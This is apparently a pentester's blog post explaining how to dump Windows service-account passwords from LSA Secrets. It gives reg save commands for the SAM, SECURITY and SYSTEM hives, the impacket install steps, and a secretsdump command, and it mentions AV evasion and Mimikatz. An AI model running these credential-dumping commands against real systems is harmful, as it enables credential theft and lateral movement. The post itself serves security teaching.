In our "pretend pentest" that we've been running these last few days, we've now got all the domain admins listed, all the service accounts found and listed, and the intersection of those two things - the service accounts that are either local admin or domain admin.
Let's get on with the job at hand.
First of all, credentials for service accounts are stored in the local registry, as what's called "LSA Secrets" in the registry key HKEY_LOCAL_MACHINE/Security/Policy/Secrets. Because the service needs to read the actual password to login as the service account, that password is in the registry in clear-text. Yup, you read that right - this is why service accounts are such a great target. LSA Secrets are well protected however, you can't just fire up regedt32 and read them - only the SYSTEM account has rights. So you need ... yes, some powershell! Not only that, many of today's tools are based on some powershell posted way back in the day on microsoft.com!
Or if you're not in the mood for PowerShell, you could use some Python tools, or Metasploit or Mimikatz works too - choose your own adventure! Often you'll need to try a few different methods, and then maybe wrap one in some "AV evasion" code to make it work for you, but the results are worth it in the end!!
Those original scripts from microsoft don't work on modern hosts with any patches applied at all, but of course there's a toolkit that's improved on these scripts over time. I generally use Nishang for the PowerShell-centric "I'm on the box" approach to LSA Secret recovery
Anyway, once it's installed, the execution if pretty straightforward:
reg save hklm\sam sam.out
reg save hklm\security security.out
reg save hklm\system system.out
Now take those files and get thee to your Kali VM! If you don't have impacket installed yet (it's not in the default install), there's no time like the present. To install:
$ sudo apt-get install python-dev python-pip -y
$ pip install --upgrade pip
$ sudo pip install pycrypto pyasn1 pyOpenSSL ldapdomaindump
$ git clone https://github.com/CoreSecurity/impacket.git
$ cd impacket
$ sudo python setup.py install
(in most cases you don't need all of those pre-reqs, I put them all in just in case). Now you're good to go:
impacket-secretsdump -sam ./sam.out -security ./security.out -system ./system.out LOCAL
(you'll find a bunch of other interesting security stuff in this tool's output - all the local account password hashes for one thing!)
At the bottom of the output, you'll see what we're looking for, the locally stored password for that service account!! In this case I put a "fake" account on my SFTP server service (Solarwinds SFTP doesn't have a service account by default).
That's it - no fuss, no muss, and best of all, nothing to trigger AV or any similar "endpoint next-gen machine-learning AI user behavioural analysis security" product on the target host.
Other tools like CrackMapExec do a good job as well - I haven't used that one specifically yet, really the impacket method has done the job for me so far. While I tend to have a "try one or two new things" or "write one new tool" rule for each test, I haven't gotten around to using any other tools for this particular thing.
Do you use a different tool to dump service passwords? Does your tool collect more useful information than just that particular thing? Or maybe you've got a cool AV evasion that relates to this? Please, use our comment form and share your experiences on this!
2 years ago
2 years ago